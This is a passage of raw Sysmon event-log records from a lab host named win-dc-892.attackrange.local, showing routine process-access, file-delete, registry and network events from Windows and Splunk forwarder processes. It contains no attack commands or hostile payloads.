12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246096C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000007293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49244776C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.onecore.dll+1602f|C:\Windows\system32\windows.cortana.onecore.dll+16127|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000007287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49246028C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+f0016|C:\Windows\System32\Windows.Storage.dll+f1978|C:\Windows\system32\windows.cortana.Desktop.dll+fa1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000007282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.991{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5d020|C:\Windows\System32\Windows.Storage.dll+6c004|C:\Windows\System32\Windows.Storage.dll+178bab|C:\Windows\system32\windows.cortana.Desktop.dll+fcba|C:\Windows\system32\windows.cortana.Desktop.dll+f91b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x80000000000000007425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.798{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\ncbservice.dll+86ee|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.798{266CAFBE-646C-6064-1300-00000000AE01}12281396C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+86c0|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.705{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=11120518EA39AEDB4F7F1EBB37A57D9C,SHA256=240567E0ED2E97D4A0A1A9D73A201B2F8C7CE400BFD1A243A21370A4933A8D04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.705{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7EE9EC52006A2EF88845D8BCE0412B50,SHA256=5E1A5F2A7AF0105671133BC38DD00451D5CADB73BD1F63DB56D8F1DE2667D715,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000007421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000007420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0001cdf9) 13241300x80000000000000007419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261d-0x594a2dc1) 13241300x80000000000000007418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72625-0xbb0e95c1) 13241300x80000000000000007417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:33.409{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262e-0x1cd2fdc1) 23542300x80000000000000007416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.377{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D993D503A6A32747DA8FDE8E00229D98,SHA256=3BE16681D78BB78ABAD8FB968746948BBE2B9ED2382694388737A4FF67407A95,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000007415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.464{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53585-false10.0.1.12-8089- 23542300x80000000000000007414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:33.081{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDAF3CE41A7C11F5EEA5E6535F060FFB,SHA256=EBD294500D59220E7B070C2A04541CE868EF4A89D3FB8E6D4F2200DC924C4C0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 